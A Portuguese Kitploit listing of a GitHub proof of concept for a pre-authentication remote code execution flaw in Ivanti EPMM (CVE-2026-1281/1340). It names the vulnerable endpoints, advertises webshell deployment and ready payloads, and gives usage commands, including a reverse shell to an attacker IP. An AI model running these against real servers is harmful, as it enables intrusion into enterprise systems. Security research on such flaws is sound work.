Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

Prova de Conceito para CVE-2026-1281 e CVE-2026-1340 - RCE Pré-Autenticação no Ivanti EPMM via Expansão Aritmética do Bash

Ver Repositório
6123há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-1281 & CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE

License Python CVSS

⚠️ AVISO: Este PoC é fornecido apenas para fins educacionais e de pesquisa em segurança. O uso sem autorização explícita é ilegal.

🎯 Descrição

Proof of Concept (PoC) completo para a exploração das vulnerabilidades CVE-2026-1281 e CVE-2026-1340 que afetam o Ivanti Endpoint Manager Mobile (EPMM). Essas vulnerabilidades permitem execução remota de código arbitrário (RCE) sem autenticação por meio de um mecanismo de Bash Arithmetic Expansion.

Vulnerabilidades

  • CVE-2026-1281 : Injeção de código no endpoint /mifs/c/appstore/fob/
  • CVE-2026-1340 : Injeção de código no endpoint /mifs/c/aftstore/fob/
  • Pontuação CVSS : 9.8 (Crítica)
  • Exploração : Ativa in-the-wild (Zero-Day)

🚀 Funcionalidades

  • ✅ Framework de validação automatizado (8 testes)
  • ✅ Exploração Pre-Auth RCE
  • ✅ Reverse shell automático
  • ✅ Implantação de webshell
  • ✅ 50+ payloads prontos para uso
  • ✅ Scripts de detecção para Blue Team
  • ✅ Documentação completa

📦 Instalação

git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py

🎯 Uso Rápido

# Teste de vulnerabilidade
python3 exploit.py -t https://target.com -c

# Validação RCE
python3 exploit.py -t https://target.com --test-rce

# Reverse shell
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444

📚 Documentação

  • README completo - Documentação técnica detalhada
  • Guia de uso - Guia passo a passo
  • Payloads - Coleção de 50+ payloads
  • Guia Red Team - Cenários operacionais

🔗 Referências

  • CERT-FR CERTFR-2026-ALE-001
  • Watchtowr Labs Analysis
  • CVE-2026-1281
  • CVE-2026-1340

👤 Autor

Mehdi Le Deaut - Consultor de Cibersegurança | Especialista em Red Team

LinkedIn

⚖️ Licença

Este projeto está licenciado sob a MIT - veja o arquivo LICENSE para mais detalhes.

🙏 Agradecimentos

  • CERT-FR pelo alerta rápido
  • Watchtowr Labs pela análise técnica
  • A comunidade de cibersegurança
Baixar ferramenta